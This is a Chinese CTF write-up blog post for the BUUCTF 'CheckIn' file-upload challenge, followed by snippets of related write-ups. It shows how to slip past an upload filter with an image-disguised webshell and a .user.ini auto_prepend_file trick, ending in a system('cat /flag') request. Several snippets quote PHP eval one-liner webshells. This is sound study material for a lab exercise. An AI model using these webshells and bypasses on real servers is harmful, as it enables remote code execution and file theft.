BUUCTF-CheckIn

最新推荐文章于 2024-06-17 10:49:46 发布
最新推荐文章于 2024-06-17 10:49:46 发布
阅读量767 收藏 1
点赞数
分类专栏: BUUCTF-wp 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47571887/article/details/121220728
版权

打开题目,貌似是一道考上传的题目

上传php文件被过滤,我们就上传图片马,

我们用.htaccess来进行解析,尝试过后貌似行不通,

这里使用.user.ini

.user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简单,直接写在.user.ini中。

我们要包含的文件为test.jpg,所以我们写入.user.ini,并加上文件头

提交并上传

可以看到我们这里上传成功了,进行访问。

http://64e17114-3a81-4456-acf8-13f720bca66f.node4.buuoj.cn:81/uploads/feec76106898a24897fbb7d1e9abeb40/index.php?shell=system('cat /flag');

 即可得到flag

八哥不爱做题
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hence-flight-checkin
05-06
link rel =" import " href =" bower_components/hence-flight-checkin/hence-flight-checkin.html " >发展所有开发都是利用/ src和/ test文件夹中的文件进行的。依存关系元素依赖关系通过NPM& 进行管理。 您...
buuctf re(二)+ web CheckIn
2202_75317918的博客
06-26 552
buuctf re(二)+ web CheckIn
BUUCTF__[SUCTF 2019]CheckIn_题解
风过江南乱的博客
05-22 1429
一、前言 最近有点烦,感觉自己什么都不会。估计是在家待的太久了,浪费了很多时间。 这学期不开学了,真烦,被网课折磨,这都快期末了。 二、看题 一个文件上传的题目,而且给了源码,但可能没有也能做。 不过我看wp都看的很懵。 先尝试上传一张正常的图片,回显了文件目录 再尝试上传php一句话木马。提示非法后缀 <?php @eval($_POST['post']) ?> 再尝试改一下文件后缀,提示有 <? 应该是黑名单过滤。 所以尝试用 <script language="
buuctf web 13、[SUCTF 2019]CheckIn
m0_46412682的博客
07-16 1059
buuctf web 13、[SUCTF 2019]CheckIn 开始的页面 1、 先上传一个正常的照片 2、再上传一个php文件,提示illegal suffix 3、上传一个只含一句话木马的后缀为gif的文件,提示内容中有<? 既然过滤了<? ,所以用 4、上传7.gif,但是提示不是gif类型,exif_imagetype是文件内容的头部看是否是对应的照片类型 我们只需要再文件中填写对应的照片头部 上传成功 5、但是要怎么样才能让照片木马执行,我们想到.htaccess
buuctf-SUCTF 2019 CheckIn(小宇特详解)
小宇的web博客
01-22 2763
buuctf-SUCTF 2019 CheckIn(小宇特详解) 咋一看这是一道文件上传 这里先尝试一下上传一个php文件 里面写一个最简单的一句话木马就行 <?php eval(@$_POST['shell']);?> 上传试试 回显illegal suffix!(非法后缀) 这里尝试一下修改文件拓展名php5,phtml,等都没有成功 然后进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀) 这里我上传一张jpg 回显<? in conten
Buuctf(文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2148
解题思路 一.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
BUUCTF-[SUCTF 2019]CheckIn
m0_61361405的博客
10-10 112
`: 这个条件语句使用正则表达式检查 `$extension` 是否包含 "ph" 或 "htacess",如果是,表示上传的文件扩展名不被允许,代码将输出 "illegal suffix!13. `if (!`: 这行代码使用 `scandir` 函数列出目录 `$userdir` 中的文件和子目录,并将结果打印出来,以展示上传到该目录的文件列表。4. `if (isset($_POST["upload"])) {`: 这个条件语句检查是否有名为 "upload" 的 POST 参数被发送到服务器。
BUUCTF:[GKCTF2020]CheckIN
qq_46230755的博客
12-16 495
这题还是很有意思的,考的点有 先看一下题目给的代码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this
[BUUCTF]CheckIn (writeup)
weixin_63306244的博客
06-22 155
因为.user.ini是将a.png放到index.php文件的顶部进行执行。回显:exif_imagetype:not image!蚁剑后面的文件是index.php并不是a.png。所以要访问的是index.php。看到这个后就可以直接上蚁剑了。进入后看到是一道上传题。那就只剩下最后一种办法。随后看看了之前用过的。
southwest-checkin-3
03-14
西南签到3.X 自动检查乘客的西南航班。 第3版是v2的升级版本,以通过Heroku托管的最新...由非Rails人员针对Ruby 2.6.3,Rails 5.2.3更新获取签到源git clone https://github.com/davidkassa/southwest-checkin-3.gitcd
genshin-daily-checkin
04-23
怎么跑 在Docker Swarm上运行 例子: docker service create --name genshin-daily-login truong996/genshin-daily-login 仅运行Docker docker run -d truong996/genshin-daily-login
sau-class-checkin
04-02
关于 这是一个脚本,如果设置正确,它将告诉SAU您的位置 因为大多数课程都是在一个小时开始的,并且一个好学生应该在该时间之前到达并办理登机手续,所以脚本会设法解决这个问题。 如果您在一个小时的更改前5分钟...
42-qr-checkin:二维码签到
04-01
$ cd 42-qr-checkin $ npm install 在42 intra上注册,然后将重定向URI设置为http://localhost:4200/login/42/return 。 将.env.sample复制到.env并编辑CLIENT_ID和CLIENT_SECRET信息。 启动服务器。 $ npm run ...
BUUCTF [SUCTF 2019]CheckIn 1(user.ini文件构成的PHP后门 | 两种解法!)
m0_73734159的博客
11-28 1415
只需要重新开启题目环境即可,最后,做这道题的步骤是,先上传.user.ini配置文件,再去上传PHP一句话木马文件。因为我们使用的是auto_prepend_file,在主文件之前就已经自动解析文件名了,所以index.php主文件在最后面。php.ini大家都熟悉,那么我们就可以把.user.ini理解为用户可自定义的php.ini配置文件。绕过后缀的文件格式有php、php3、php4、php5、phtml、pht。.user.ini配置文件和.htaccess配置文件都是为了解析PHP代码。
青少年CTF——CheckIn文件上传绕过——WriteUp
Amazingsuger的博客
01-20 847
青少年CTF-CheckIn文件上传绕过——WriteUp
[GKCTF2020]CheckIN 详细解题思路及做法
EC_Carrot的博客
12-07 1791
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 打开题目,看到class以为是反序列化,但实际并不是,这里直接用$_REQUEST传入了参数便可以利用了。 看到base64_decode,说明我们的代码需要加密一下,尝试着直接传入c3lzdGVtKCdscycpOw==(即为base64加密后的system('ls');) 发现并不能返回数据,是难道是不能这么利用吗? 接着我尝试了一下cGh
BUUCTF_[SUCTF 2019]CheckIn
TenG的博客
05-22 1094
前言 问君能有几多愁?恰似一江春水向东流 先扯些题外话,这个题目是在BUUCTF刷到的,本来以为就是普通的文件上传,但是看了其他师傅的文章以后发现了新姿势,这次利用到的知识点也刷新了我对文件上传类题目的认知,所以特此记录一下。本文也参考了这位大师傅的文章,然后再结合我自己的理解记录下来,当然我的理解还不够透彻,所以还请各位师傅多多指教。 正文 先来看下题目页面 可以看到这就是普通的文件上传页面,开始呢我也是用的以前的常规方法去试的,什么修改MIME类型、图片合成马、00截断啊都试了,但是没有一个能用的。
[GXYCTF2019]CheckIn 以及rot5/13/18/47详解
qq_45705626的博客
11-22 1007
一开始我看到了很多的符号,就猜测可能会不会是uuencode加密,测试后发现不是,但是我觉得多半也是解密以后是关于ASCII编码的情况,在看了wp以后,才知道是rot47编码,直接只知道rot13,但是不清楚rot47,解密以后得到flag。18就是13+5的合成,所以rot13的加密方法就是rot5+rot13,对数字进行rot5加密,对字母进行rot13加密。移动47位,替换成新的ASCII值,比如Z对应的ASCII值是90,则90-47=43,对应的就是+号。的替换,作用是将当前的这位数字。
深入解析PHP函数
最新发布
NatLindsay的博客
06-17 421
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP中,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见的函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
2021gkctf checkin
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值